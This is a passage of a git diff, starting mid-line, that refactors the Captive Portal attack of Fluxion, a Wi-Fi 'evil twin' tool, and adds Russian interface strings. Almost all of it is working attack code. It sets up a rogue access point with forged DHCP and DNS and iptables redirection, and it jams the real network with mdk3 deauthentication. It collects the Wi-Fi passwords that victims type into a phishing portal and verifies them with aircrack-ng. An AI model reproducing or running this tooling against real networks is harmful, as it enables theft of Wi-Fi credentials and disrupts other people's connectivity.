$IP | awk '{print $5}' | grep : | head -n 1 | tr [:upper:] [:lower:]) +captive_portal_get_IP_MAC() { + if [ -f "$CaptivePortalPassLog/$FluxionTargetSSIDClean-$FluxionTargetMAC-IP.log" ] && \ + [ "$(captive_portal_get_client_IP)" != "" ] && \ + [ -f "$FLUXIONWorkspacePath/clients.txt" ]; then + local IP=$(captive_portal_get_client_IP) + local MatchedClientMAC=$( + cat $FLUXIONWorkspacePath/clients.txt | \ + grep $IP | awk '{print $5}' | grep : | head -n 1 | \ + tr [:upper:] [:lower:] + ) if [ "$(echo $MatchedClientMAC | wc -m)" != "18" ]; then - MatchedClientMAC="xx:xx:xx:xx:xx:xx" + local MatchedClientMAC="xx:xx:xx:xx:xx:xx" fi else - MatchedClientMAC="unknown" + local MatchedClientMAC="unknown" fi echo $MatchedClientMAC } -function captive_portal_get_MAC_brand() { - local MACManufacturer="" +captive_portal_get_MAC_brand() { if [ $(captive_portal_get_IP_MAC) != "" ]; then - MACManufacturer=$(macchanger -l | grep "$(echo "$(captive_portal_get_IP_MAC)" | cut -d ":" -f -3)" | cut -d " " -f 5-) + local MACManufacturer=$( macchanger -l | \ + grep "$(echo "$(captive_portal_get_IP_MAC)" | cut -d ":" -f -3)" | \ + cut -d " " -f 5-) if echo "$MACManufacturer" | grep -q x; then - MACManufacturer="unknown" + local MACManufacturer="unknown" fi else - MACManufacturer="unknown" + local MACManufacturer="unknown" fi echo $MACManufacturer } -# Create different settings required for the script -function captive_portal_set_attack() { - # AP Service: Prepare service for an attack. - if [ "$APRogueService" ]; then ap_prep + +captive_portal_unset_attack() { + sandbox_remove_workfile \ + "$FLUXIONWorkspacePath/captive_portal_authenticator.sh" + sandbox_remove_workfile \ + "$FLUXIONWorkspacePath/fluxion_captive_portal_dns.py" + sandbox_remove_workfile "$FLUXIONWorkspacePath/lighttpd.conf" + sandbox_remove_workfile "$FLUXIONWorkspacePath/dhcpd.leases" + sandbox_remove_workfile "$FLUXIONWorkspacePath/captive_portal/check.php" + sandbox_remove_workfile "$FLUXIONWorkspacePath/captive_portal" + + # Only reset the AP if one has been defined. + if [ "$CaptivePortalAPService" -a "$(type -t ap_service_reset)" ]; then + ap_service_reset fi +} + +# Create different settings required for the script +captive_portal_set_attack() { + # Load and set the captive portal user interface. + cp -r "$FLUXIONPath/attacks/Captive Portal/sites/$CaptivePortalUserInterface.portal" \ + "$FLUXIONWorkspacePath/captive_portal" + + find "$FLUXIONWorkspacePath/captive_portal/" -type f -exec \ + sed -i -e 's/$APTargetSSID/'"${FluxionTargetSSID//\//\\\/}"'/g; s/$APTargetMAC/'"${FluxionTargetMAC//\//\\\/}"'/g; s/$APTargetChannel/'"${FluxionTargetChannel//\//\\\/}"'/g' {} \; + # Add the PHP authenticator scripts, used to verify # password attempts from users using the web interface. @@ -435,21 +567,35 @@ function captive_portal_set_attack() { cp -r "$FLUXIONPath/attacks/Captive Portal/lib/connectivity responses/" \ "$FLUXIONWorkspacePath/captive_portal/connectivity_responses" + + # AP Service: Prepare service for an attack. + if [ "$CaptivePortalAPService" ]; then + ap_service_prep \ + "$CaptivePortalAccessPointInterface" \ + "$CaptivePortalGatewayAddress" \ + "$FluxionTargetSSID" \ + "$FluxionTargetRogueMAC" \ + "$FluxionTargetChannel" + + CaptivePortalAccessInterface=$APServiceAccessInterface + fi + + # Generate the dhcpd configuration file, which is - # used to provide DHCP service to APRogue clients. + # used to provide DHCP service to rogue AP clients. echo "\ authoritative; default-lease-time 600; max-lease-time 7200; -subnet $VIGWNetwork.0 netmask 255.255.255.0 { - option broadcast-address $VIGWNetwork.255; - option routers $VIGWAddress; +subnet $CaptivePortalGatewayNetwork.0 netmask 255.255.255.0 { + option broadcast-address $CaptivePortalGatewayNetwork.255; + option routers $CaptivePortalGatewayAddress; option subnet-mask 255.255.255.0; - option domain-name-servers $VIGWAddress; + option domain-name-servers $CaptivePortalGatewayAddress; - range $VIGWNetwork.100 $VIGWNetwork.254; + range $CaptivePortalGatewayNetwork.100 $CaptivePortalGatewayNetwork.254; }\ " >"$FLUXIONWorkspacePath/dhcpd.conf" @@ -475,7 +621,7 @@ fastcgi.server = ( \".php\" => ( ( \"bin-path\" => \"/usr/bin/php-cgi\", - \"socket\" => \"/php.socket\" + \"socket\" => \"/tmp/fluxspace/php.socket\" ) ) ) @@ -579,7 +725,7 @@ class DNSQuery: return packet if __name__ == '__main__': - ip='$VIGWAddress' + ip='$CaptivePortalGatewayAddress' print 'pyminifakeDwebconfNS:: dom.query. 60 IN A %s' % ip udps = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) @@ -598,16 +744,17 @@ if __name__ == '__main__': chmod +x "$FLUXIONWorkspacePath/fluxion_captive_portal_dns.py" + local -r targetSSIDCleanNormalized=${FluxionTargetSSIDClean//"/\\"} # Attack arbiter script echo "\ #!/bin/bash -function signal_stop_attack() { +signal_stop_attack() { kill -s SIGABRT $$ # Signal STOP ATTACK handle_abort_authenticator } -function handle_abort_authenticator() { +handle_abort_authenticator() { AuthenticatorState=\"aborted\" } @@ -670,25 +817,25 @@ while [ \$AuthenticatorState = \"running\" ]; do if [ -f \"$FLUXIONWorkspacePath/pwdattempt.txt\" -a -s \"$FLUXIONWorkspacePath/pwdattempt.txt\" ]; then # Save any new password attempt. - cat \"$FLUXIONWorkspacePath/pwdattempt.txt\" >> \"$CaptivePortalPassLog/${APTargetSSIDClean//\"/\\\"}-$APTargetMAC.log\" + cat \"$FLUXIONWorkspacePath/pwdattempt.txt\" >> \"$CaptivePortalPassLog/$targetSSIDCleanNormalized-$FluxionTargetMAC.log\" # Clear logged password attempt. echo -n > \"$FLUXIONWorkspacePath/pwdattempt.txt\" fi if [ -f \"$FLUXIONWorkspacePath/ip_hits\" -a -s \"$FLUXIONWorkspacePath/ip_hits.txt\" ]; then - cat \"$FLUXIONWorkspacePath/ip_hits\" >> \"$CaptivePortalPassLog/${APTargetSSIDClean//\"/\\\"}-$APTargetMAC-IP.log\" - echo \" \" >> \"$CaptivePortalPassLog/${APTargetSSIDClean//\"/\\\"}-$APTargetMAC-IP.log\" + cat \"$FLUXIONWorkspacePath/ip_hits\" >> \"$CaptivePortalPassLog/$targetSSIDCleanNormalized-$FluxionTargetMAC-IP.log\" + echo \" \" >> \"$CaptivePortalPassLog/$targetSSIDCleanNormalized-$FluxionTargetMAC-IP.log\" echo -n > \"$FLUXIONWorkspacePath/ip_hits\" fi " >>"$FLUXIONWorkspacePath/captive_portal_authenticator.sh" - if [ $APRogueAuthMode = "hash" ]; then + if [ $CaptivePortalAuthenticatorMode = "hash" ]; then echo " if [ -f \"$FLUXIONWorkspacePath/candidate_result.txt\" ]; then # Check if we've got the correct password by looking for anything other than \"Passphrase not in\". - if ! aircrack-ng -w \"$FLUXIONWorkspacePath/candidate.txt\" \"$FLUXIONWorkspacePath/${APTargetSSIDClean//\"/\\\"}-$APTargetMAC.cap\" | grep -qi \"Passphrase not in\"; then + if ! aircrack-ng -w \"$FLUXIONWorkspacePath/candidate.txt\" \"$CaptivePortalHashPath\" | grep -qi \"Passphrase not in\"; then echo \"2\" > \"$FLUXIONWorkspacePath/candidate_result.txt\" sleep 1 @@ -701,16 +848,16 @@ while [ \$AuthenticatorState = \"running\" ]; do fi" >>"$FLUXIONWorkspacePath/captive_portal_authenticator.sh" fi - local staticSSID=$(printf "%q" "$APTargetSSID" | sed -r 's/\\\ / /g' | sed -r "s/\\\'/\'/g") + local -r staticSSID=$(printf "%q" "$FluxionTargetSSID" | sed -r 's/\\\ / /g' | sed -r "s/\\\'/\'/g") echo " - DHCPClients=($(nmap -PR -sn -n -oG - $VIGWNetwork.100-110 2>&1 | grep Host)) + DHCPClients=($(nmap -PR -sn -n -oG - $CaptivePortalGatewayNetwork.100-110 2>&1 | grep Host)) echo echo -e \" ACCESS POINT:\" printf \" SSID ...........: $CWht%s$CClr\\n\" \"$staticSSID\" - echo -e \" MAC ............: $CYel$APTargetMAC$CClr\" - echo -e \" Channel ........: $CWht$APTargetChannel$CClr\" - echo -e \" Vendor .........: $CGrn${APTargetMaker:-UNKNOWN}$CClr\" + echo -e \" MAC ............: $CYel$FluxionTargetMAC$CClr\" + echo -e \" Channel ........: $CWht$FluxionTargetChannel$CClr\" + echo -e \" Vendor .........: $CGrn${FluxionTargetMaker:-UNKNOWN}$CClr\" echo -e \" Runtime ........: $CBlu\$ih\$h:\$im\$m:\$is\$s$CClr\" echo -e \" Attempts .......: $CRed\$(cat $FLUXIONWorkspacePath/hit.txt)$CClr\" echo -e \" Clients ........: $CBlu\$(cat $FLUXIONWorkspacePath/clients.txt | grep DHCPACK | awk '{print \$5}' | sort| uniq | wc -l)$CClr\" @@ -741,7 +888,7 @@ while [ \$AuthenticatorState = \"running\" ]; do echo -ne \"\033[K\033[u\"" >>"$FLUXIONWorkspacePath/captive_portal_authenticator.sh" - if [ $APRogueAuthMode = "hash" ]; then + if [ $CaptivePortalAuthenticatorMode = "hash" ]; then echo " sleep 1" >>"$FLUXIONWorkspacePath/captive_portal_authenticator.sh" fi @@ -763,18 +910,18 @@ echo \" FLUXION $FLUXIONVersion.$FLUXIONRevision SSID: \\\"$staticSSID\\\" -BSSID: $APTargetMAC ($APTargetMaker) -Channel: $APTargetChannel -Security: $APTargetEncryption +BSSID: $FluxionTargetMAC ($FluxionTargetMaker) +Channel: $FluxionTargetChannel +Security: $FluxionTargetEncryption Time: \$ih\$h:\$im\$m:\$is\$s Password: \$(cat $FLUXIONWorkspacePath/candidate.txt) Mac: $(captive_portal_get_IP_MAC) ($(captive_portal_get_MAC_brand)) IP: $(captive_portal_get_client_IP) -\" >\"$CaptivePortalNetLog/${APTargetSSIDClean//\"/\\\"}-$APTargetMAC.log\"" >>"$FLUXIONWorkspacePath/captive_portal_authenticator.sh" +\" >\"$CaptivePortalNetLog/$targetSSIDCleanNormalized-$FluxionTargetMAC.log\"" >>"$FLUXIONWorkspacePath/captive_portal_authenticator.sh" - if [ $APRogueAuthMode = "hash" ]; then + if [ $CaptivePortalAuthenticatorMode = "hash" ]; then echo " -aircrack-ng -a 2 -b $APTargetMAC -0 -s \"$FLUXIONWorkspacePath/${APTargetSSIDClean//\"/\\\"}-$APTargetMAC.cap\" -w \"$FLUXIONWorkspacePath/candidate.txt\" && echo && echo -e \"The password was saved in "$CRed"$CaptivePortalNetLog/${APTargetSSIDClean//\"/\\\"}-$APTargetMAC.log"$CClr"\"\ +aircrack-ng -a 2 -b $FluxionTargetMAC -0 -s \"$CaptivePortalHashPath\" -w \"$FLUXIONWorkspacePath/candidate.txt\" && echo && echo -e \"The password was saved in "$CRed"$CaptivePortalNetLog/$targetSSIDCleanNormalized-$FluxionTargetMAC.log"$CClr"\"\ " >>"$FLUXIONWorkspacePath/captive_portal_authenticator.sh" fi @@ -782,7 +929,7 @@ aircrack-ng -a 2 -b $APTargetMAC -0 -s \"$FLUXIONWorkspacePath/${APTargetSSIDCle } # Generate the contents for a generic web interface -function captive_portal_generic() { +captive_portal_generic() { if [ ! -d "$FLUXIONWorkspacePath/captive_portal" ]; then mkdir "$FLUXIONWorkspacePath/captive_portal" fi @@ -876,8 +1023,8 @@ function captive_portal_generic() {

-
$APTargetSSID ($APTargetMAC)
- +
$FluxionTargetSSID ($FluxionTargetMAC)
+

@@ -907,10 +1054,10 @@ function captive_portal_generic() { " >"$FLUXIONWorkspacePath/captive_portal/index.html" } -function captive_portal_unset_routes() { - if [ -f "$FLUXIONWorkspacePath/iptables-rules" ]; then - iptables-restore <"$FLUXIONWorkspacePath/iptables-rules" &>$FLUXIONOutputDevice - sandbox_remove_workfile "$FLUXIONWorkspacePath/iptables-rules" +captive_portal_unset_routes() { + if [ -f "$FLUXIONIPTablesBackup" ]; then + iptables-restore <"$FLUXIONIPTablesBackup" \ + &> $FLUXIONOutputDevice else iptables --flush iptables --table nat --flush @@ -920,19 +1067,21 @@ function captive_portal_unset_routes() { # Restore system's original forwarding state if [ -f "$FLUXIONWorkspacePath/ip_forward" ]; then - sysctl -w net.ipv4.ip_forward=$(cat "$FLUXIONWorkspacePath/ip_forward") &>$FLUXIONOutputDevice + sysctl -w net.ipv4.ip_forward=$( + cat "$FLUXIONWorkspacePath/ip_forward" + ) &> $FLUXIONOutputDevice sandbox_remove_workfile "$FLUXIONWorkspacePath/ip_forward" fi - ip addr del $VIGWAddress/24 dev $VIGW 2>/dev/null + ip addr del $CaptivePortalGatewayAddress/24 dev $CaptivePortalAccessInterface 2>/dev/null } # Set up DHCP / WEB server # Set up DHCP / WEB server -function captive_portal_set_routes() { +captive_portal_set_routes() { # Give an address to the gateway interface in the rogue network. # This makes the interface accessible from the rogue network. - ip addr add $VIGWAddress/24 dev $VIGW + ip addr add $CaptivePortalGatewayAddress/24 dev $CaptivePortalAccessInterface # Save the system's routing state to restore later. cp "/proc/sys/net/ipv4/ip_forward" "$FLUXIONWorkspacePath/ip_forward" @@ -940,44 +1089,45 @@ function captive_portal_set_routes() { # Activate system IPV4 packet routing/forwarding. sysctl -w net.ipv4.ip_forward=1 &>$FLUXIONOutputDevice - iptables-save >"$FLUXIONWorkspacePath/iptables-rules" - iptables --flush iptables --table nat --flush iptables --delete-chain iptables --table nat --delete-chain iptables -P FORWARD ACCEPT - iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to-destination $VIGWAddress:80 - iptables -t nat -A PREROUTING -p tcp --dport 443 -j DNAT --to-destination $VIGWAddress:443 + iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT \ + --to-destination $CaptivePortalGatewayAddress:80 + iptables -t nat -A PREROUTING -p tcp --dport 443 -j DNAT \ + --to-destination $CaptivePortalGatewayAddress:443 iptables -A INPUT -p tcp --sport 443 -j ACCEPT iptables -A OUTPUT -p tcp --dport 443 -j ACCEPT iptables -t nat -A POSTROUTING -j MASQUERADE } -function captive_portal_stop_interface() { +captive_portal_stop_interface() { captive_portal_unset_routes - if [ "$APRogueService" ]; then ap_stop + if [ "$CaptivePortalAPService" ]; then + ap_service_stop fi } -function captive_portal_start_interface() { - if [ "$APRogueService" ]; then +captive_portal_start_interface() { + if [ "$CaptivePortalAPService" ]; then echo -e "$FLUXIONVLine $CaptivePortalStaringAPServiceNotice" - ap_start + ap_service_start else fluxion_header echo -e "$FLUXIONVLine Configuration for external access point device:" echo - fluxion_show_ap_info "$APRogueSSID" "OPEN" "$APTargetChannel" "$APRogueMAC" "$APTargetMaker" + fluxion_target_show - echo -e "$FLUXIONVLine IPv4 Address: ${VIGWAddress%.*}.2/24" + echo -e "$FLUXIONVLine IPv4 Address: ${CaptivePortalGatewayAddress%.*}.2/24" echo -e "$FLUXIONVLine IPv6 Address: Disabled" - echo -e "$FLUXIONVLine DHCP Server: $VIGWAddress" - echo -e "$FLUXIONVLine DNS Server: $VIGWAddress" + echo -e "$FLUXIONVLine DHCP Server: $CaptivePortalGatewayAddress" + echo -e "$FLUXIONVLine DNS Server: $CaptivePortalGatewayAddress" echo echo -e "$FLUXIONVLine ${CYel}Assure external AP device is available & configured before continuing!${CClr}" @@ -988,61 +1138,107 @@ function captive_portal_start_interface() { captive_portal_set_routes & sleep 3 - fuser -n tcp -k 53 67 80 443 &>$FLUXIONOutputDevice - fuser -n udp -k 53 67 80 443 &>$FLUXIONOutputDevice + fuser -n tcp -k 53 67 80 443 &> $FLUXIONOutputDevice + fuser -n udp -k 53 67 80 443 &> $FLUXIONOutputDevice } -function unprep_attack() { - CaptivePortalState="Not Ready" - captive_portal_unset_attack - captive_portal_unset_site - captive_portal_unset_conn - captive_portal_unset_cert - captive_portal_unset_auth - captive_portal_unset_interface -} -function prep_attack() { - while true; do - captive_portal_set_interface - if [ $? -ne 0 ]; then break; fi - captive_portal_set_auth - if [ $? -ne 0 ]; then - captive_portal_unset_interface - continue - fi - captive_portal_set_cert - if [ $? -ne 0 ]; then - captive_portal_unset_auth - continue - fi - captive_portal_set_conn - if [ $? -ne 0 ]; then - captive_portal_unset_cert - continue - fi - captive_portal_set_site - if [ $? -ne 0 ]; then - captive_portal_unset_conn - continue - fi - captive_portal_set_attack - if [ $? -ne 0 ]; then - captive_portal_unset_site - continue - fi - CaptivePortalState="Ready" - break +# ============================================================ # +# =================== < Parse Parameters > =================== # +# ============================================================ # +if [ ! "$CaptivePortalCLIArguments" ]; then + if ! CaptivePortalCLIArguments=$( + getopt --options="a:j:s:c:u:h:" \ + --longoptions="ap:,jammer:,ssl:,connectivity:,ui:,hash:" \ + --name="Captive Portal V$FLUXIONVersion.$FLUXIONRevision" -- "$@" + ); then + echo -e "${CRed}Aborted$CClr, parameter error detected..." + sleep 5 + fluxion_handle_exit + fi + + declare -r CaptivePortalCLIArguments=$CaptivePortalCLIArguments + + eval set -- "$CaptivePortalCLIArguments" # Set environment parameters. +fi + + +# ============================================================ # +# ============= < Argument Loaded Configurables > ============ # +# ============================================================ # +while [ "$1" != "" -a "$1" != "--" ]; do + case "$1" in + -a|--ap) + CaptivePortalUninitializedAccessPointInterface=$2; shift;; + -j|--jammer) + CaptivePortalUninitializedJammerInterface=$2; shift;; + -s|--ssl) + CaptivePortalSSLCertificatePath=$2; shift;; + -c|--connectivity) + CaptivePortalConnectivity=$2; shift;; + -u|--ui) + CaptivePortalUserInterface=$2; shift;; + -h|--hash) + # Assuming hash auth-mode here (the only one available as of now). + # WARNING: If more auth-modes are added, assume hash auth-mode here! + CaptivePortalHashPath=$2; shift;; + esac + shift # Shift new parameters +done + + +# ============================================================ # +# ===================== < Fluxion Hooks > ==================== # +# ============================================================ # +attack_targetting_interfaces() { + interface_list_wireless + local interface + for interface in "${InterfaceListWireless[@]}"; do + echo "$interface" done +} - # Check for prep abortion. - if [ "$CaptivePortalState" != "Ready" ]; then - unprep_attack +attack_tracking_interfaces() { + interface_list_wireless + local interface + for interface in "${InterfaceListWireless[@]}"; do + echo "$interface" + done + echo "" # This enables the Skip option. +} + +unprep_attack() { + CaptivePortalState="Not Ready" + + captive_portal_unset_attack + captive_portal_unset_user_interface + captive_portal_unset_connectivity + captive_portal_unset_certificate + captive_portal_unset_authenticator + captive_portal_unset_ap_interface + captive_portal_unset_jammer_interface +} + +prep_attack() { + local sequence=( + "set_jammer_interface" + "set_ap_interface" + "set_ap_service" + "set_authenticator" + "set_certificate" + "set_connectivity" + "set_user_interface" + "set_attack" + ) + + if ! fluxion_do_sequence captive_portal sequence[@]; then return 1 fi + + CaptivePortalState="Ready" } -function stop_attack() { +stop_attack() { # Attempt to find PIDs of any running authenticators. local authenticatorPID=$(ps a | grep -vE "xterm|grep" | grep captive_portal_authenticator.sh | awk '{print $1}') @@ -1050,32 +1246,35 @@ function stop_attack() { if [ "$authenticatorPID" ]; then kill -s SIGABRT $authenticatorPID; fi if [ "$CaptivePortalJammerServiceXtermPID" ]; then - kill $(pgrep -P $CaptivePortalJammerServiceXtermPID 2>$FLUXIONOutputDevice) &>$FLUXIONOutputDevice + kill $(pgrep -P $CaptivePortalJammerServiceXtermPID \ + 2> $FLUXIONOutputDevice) &> $FLUXIONOutputDevice CaptivePortalJammerServiceXtermPID="" # Clear parent PID fi sandbox_remove_workfile "$FLUXIONWorkspacePath/mdk3_blacklist.lst" # Kill captive portal web server log viewer. if [ "$CaptivePortalWebServiceXtermPID" ]; then - kill $CaptivePortalWebServiceXtermPID &>$FLUXIONOutputDevice + kill $CaptivePortalWebServiceXtermPID &> $FLUXIONOutputDevice CaptivePortalWebServiceXtermPID="" # Clear service PID fi # Kill captive portal web server. if [ "$CaptivePortalWebServicePID" ]; then - kill $CaptivePortalWebServicePID &>$FLUXIONOutputDevice + kill $CaptivePortalWebServicePID &> $FLUXIONOutputDevice CaptivePortalWebServicePID="" # Clear service PID fi # Kill python DNS service if one is found. if [ "$CaptivePortalDNSServiceXtermPID" ]; then - kill $(pgrep -P $CaptivePortalDNSServiceXtermPID 2>$FLUXIONOutputDevice) &>$FLUXIONOutputDevice + kill $(pgrep -P $CaptivePortalDNSServiceXtermPID \ + 2> $FLUXIONOutputDevice) &> $FLUXIONOutputDevice CaptivePortalDNSServiceXtermPID="" # Clear parent PID fi # Kill DHCP service. if [ "$CaptivePortalDHCPServiceXtermPID" ]; then - kill $(pgrep -P $CaptivePortalDHCPServiceXtermPID 2>$FLUXIONOutputDevice) &>$FLUXIONOutputDevice + kill $(pgrep -P $CaptivePortalDHCPServiceXtermPID \ + 2> $FLUXIONOutputDevice) &> $FLUXIONOutputDevice CaptivePortalDHCPServiceXtermPID="" # Clear parent PID fi sandbox_remove_workfile "$FLUXIONWorkspacePath/clients.txt" @@ -1085,7 +1284,7 @@ function stop_attack() { CaptivePortalState="Stopped" } -function start_attack() { +start_attack() { if [ "$CaptivePortalState" = "Running" ]; then return 0; fi if [ "$CaptivePortalState" != "Ready" ]; then return 1; fi CaptivePortalState="Running" @@ -1095,27 +1294,41 @@ function start_attack() { captive_portal_start_interface echo -e "$FLUXIONVLine $CaptivePortalStartingDHCPServiceNotice" - xterm $FLUXIONHoldXterm $TOPLEFT -bg black -fg "#CCCC00" -title "FLUXION AP DHCP Service" -e "dhcpd -d -f -lf \"$FLUXIONWorkspacePath/dhcpd.leases\" -cf \"$FLUXIONWorkspacePath/dhcpd.conf\" $VIGW 2>&1 | tee -a \"$FLUXIONWorkspacePath/clients.txt\"" & - CaptivePortalDHCPServiceXtermPID=$! # Save parent's pid, to get to child later. + xterm $FLUXIONHoldXterm $TOPLEFT -bg black -fg "#CCCC00" \ + -title "FLUXION AP DHCP Service" -e \ + "dhcpd -d -f -lf \"$FLUXIONWorkspacePath/dhcpd.leases\" -cf \"$FLUXIONWorkspacePath/dhcpd.conf\" $CaptivePortalAccessInterface 2>&1 | tee -a \"$FLUXIONWorkspacePath/clients.txt\"" & + # Save parent's pid, to get to child later. + CaptivePortalDHCPServiceXtermPID=$! echo -e "$FLUXIONVLine $CaptivePortalStartingDNSServiceNotice" - xterm $FLUXIONHoldXterm $BOTTOMLEFT -bg black -fg "#99CCFF" -title "FLUXION AP DNS Service" -e "if type python2 >/dev/null 2>/dev/null; then python2 \"$FLUXIONWorkspacePath/fluxion_captive_portal_dns.py\"; else python \"$FLUXIONWorkspacePath/fluxion_captive_portal_dns.py\"; fi" & - CaptivePortalDNSServiceXtermPID=$! # Save parent's pid, to get to child later. + xterm $FLUXIONHoldXterm $BOTTOMLEFT -bg black -fg "#99CCFF" \ + -title "FLUXION AP DNS Service" -e \ + "if type python2 >/dev/null 2>/dev/null; then python2 \"$FLUXIONWorkspacePath/fluxion_captive_portal_dns.py\"; else python \"$FLUXIONWorkspacePath/fluxion_captive_portal_dns.py\"; fi" & + # Save parent's pid, to get to child later. + CaptivePortalDNSServiceXtermPID=$! echo -e "$FLUXIONVLine $CaptivePortalStartingWebServiceNotice" - lighttpd -f "$FLUXIONWorkspacePath/lighttpd.conf" &>$FLUXIONOutputDevice + lighttpd -f "$FLUXIONWorkspacePath/lighttpd.conf" \ + &> $FLUXIONOutputDevice CaptivePortalWebServicePID=$! - xterm $FLUXIONHoldXterm $BOTTOM -bg black -fg "#00CC00" -title "FLUXION Web Service" -e "tail -f \"$FLUXIONWorkspacePath/lighttpd.log\"" & + xterm $FLUXIONHoldXterm $BOTTOM -bg black -fg "#00CC00" \ + -title "FLUXION Web Service" -e \ + "tail -f \"$FLUXIONWorkspacePath/lighttpd.log\"" & CaptivePortalWebServiceXtermPID=$! echo -e "$FLUXIONVLine $CaptivePortalStartingJammerServiceNotice" - echo -e "$APTargetMAC" >"$FLUXIONWorkspacePath/mdk3_blacklist.lst" - xterm $FLUXIONHoldXterm $BOTTOMRIGHT -bg black -fg "#FF0009" -title "FLUXION AP Jammer Service [$APTargetSSID]" -e "mdk3 $WIMonitor d -c $APTargetChannel -b \"$FLUXIONWorkspacePath/mdk3_blacklist.lst\"" & - CaptivePortalJammerServiceXtermPID=$! # Save parent's pid, to get to child later. + echo -e "$FluxionTargetMAC" >"$FLUXIONWorkspacePath/mdk3_blacklist.lst" + xterm $FLUXIONHoldXterm $BOTTOMRIGHT -bg black -fg "#FF0009" \ + -title "FLUXION AP Jammer Service [$FluxionTargetSSID]" -e \ + "mdk3 $CaptivePortalJammerInterface d -c $FluxionTargetChannel -b \"$FLUXIONWorkspacePath/mdk3_blacklist.lst\"" & + # Save parent's pid, to get to child later. + CaptivePortalJammerServiceXtermPID=$! echo -e "$FLUXIONVLine $CaptivePortalStartingAuthenticatorServiceNotice" - xterm -hold $TOPRIGHT -bg black -fg "#CCCCCC" -title "FLUXION AP Authenticator" -e "$FLUXIONWorkspacePath/captive_portal_authenticator.sh" & + xterm -hold $TOPRIGHT -bg black -fg "#CCCCCC" \ + -title "FLUXION AP Authenticator" \ + -e "$FLUXIONWorkspacePath/captive_portal_authenticator.sh" & } diff --git a/attacks/Captive Portal/language/en.sh b/attacks/Captive Portal/language/en.sh index 9f50533..fd480a6 100755 --- a/attacks/Captive Portal/language/en.sh +++ b/attacks/Captive Portal/language/en.sh @@ -2,6 +2,12 @@ # identifier: Captive Portal # description: Creates an "evil twin" access point. +CaptivePortalJammerInterfaceQuery="Select an interface for jamming." +CaptivePortalAccessPointInterfaceQuery="Select an interface for the access point." + +CaptivePortalAPServiceQuery="Select an access point service" +CaptivePortalAPServiceHostapdOption="Rogue AP - hostapd (${CGrn}recommended$CClr)" +CaptivePortalAPServiceAirbaseOption="Rogue AP - airbase-ng (${CYel}slow$CClr)" # >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> CaptivePortalInterfaceQuery="Select an interface for the captive portal." CaptivePortalStartingInterfaceNotice="Starting captive portal interface..." diff --git a/attacks/Captive Portal/language/ru.sh b/attacks/Captive Portal/language/ru.sh new file mode 100755 index 0000000..4b02158 --- /dev/null +++ b/attacks/Captive Portal/language/ru.sh @@ -0,0 +1,38 @@ +#!/bin/bash +# identifier: Captive Portal +# description: Создаёт точку доступа "Злой Двойник". + +CaptivePortalJammerInterfaceQuery="Выберите интерфейс для глушения." +CaptivePortalAccessPointInterfaceQuery="Выберите интерфейс для точки доступа." + +CaptivePortalAPServiceQuery="Выберите службу точки доступа" +CaptivePortalAPServiceHostapdOption="Rogue AP - hostapd (${CGrn}рекомендуется$CClr)" +CaptivePortalAPServiceAirbaseOption="Rogue AP - airbase-ng (${CYel}медленная$CClr)" +# >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> +CaptivePortalInterfaceQuery="Выберите интерфейс для перехватывающего портала (captive portal)." +CaptivePortalStartingInterfaceNotice="Запуск интерфейса перехватывающего портала..." +CaptivePortalCannotStartInterfaceError="${CRed}Не получается запустить перехватывающий портал interface$CClr, возврат!" +CaptivePortalStartedInterfaceNotice="${CGrn}Успех${CClr}, интерфейс перехватывающего портала готов!" +CaptivePortalStaringAPServiceNotice="Запуск службы точки доступа с Перехватывающим Порталом..." +CaptivePortalStaringAPRoutesNotice="Запуск маршрутизации точки доступа с Перехватывающим Порталом..." +CaptivePortalStartingDHCPServiceNotice="Запуск службы DHCP точки доступа в качестве демона..." +CaptivePortalStartingDNSServiceNotice="Запуск службы DNS точки доступа в качестве демона..." +CaptivePortalStartingWebServiceNotice="Запуск точки доступа с Перехватывающим Порталом в качестве демона..." +CaptivePortalStartingJammerServiceNotice="Запуск глушителя точки доступа в качестве демона..." +CaptivePortalStartingAuthenticatorServiceNotice="Запуск скрипта аутентификации..." +# >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> +CaptivePortalVerificationMethodQuery="Выбор метода верификации пароля" +# >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> +CaptivePortalCertificateSourceQuery="Выбор источника SSL сертификата для перехватывающего портала." +CaptivePortalCertificateSourceGenerateOption="Создание SSL сертификата" +CaptivePortalCertificateSourceRescanOption="Обнаружение SSL сертификата (${CClr}искать снова$CGry)" +CaptivePortalCertificateSourceDisabledOption="Нет (${CYel} SSL отключено$CGry)" +CaptivePortalUIQuery="Выберите интерфейс перехватывающего портала для мошеннической сети." +CaptivePortalGenericInterfaceOption="Обычный Портал" +# >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> +CaptivePortalConnectivityQuery="Выберите тип Интернет-соединения для мошеннической сети." +CaptivePortalConnectivityDisconnectedOption="отключено (${CGrn}рекомендуется$CClr)" +CaptivePortalConnectivityEmulatedOption="эмулирован" +# >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> + +# FLUXSCRIPT END diff --git a/attacks/Handshake Snooper/attack.sh b/attacks/Handshake Snooper/attack.sh index 84c39a3..af806da 100755 --- a/attacks/Handshake Snooper/attack.sh +++ b/attacks/Handshake Snooper/attack.sh @@ -1,12 +1,27 @@ #!/bin/bash -########################### < Handshake Snooper Parameters > ########################### +# ============================================================ # +# ============= < Handshake Snooper Parameters > ============= # +# ============================================================ # HandshakeSnooperState="Not Ready" -################################# < Handshake Snooper > ################################ -function handshake_snooper_arbiter_daemon() { - if [ ${#@} -lt 1 -o "$HandshakeSnooperState" != "Running" ]; then return 1; fi + +# ============================================================ # +# ========= < Handshake Snooper Helper Subroutines > ========= # +# ============================================================ # +handshake_snooper_header() { + fluxion_header; fluxion_target_show; echo +} + + +# ============================================================ # +# ============= < Handshake Snooper Subroutines > ============ # +# ============================================================ # 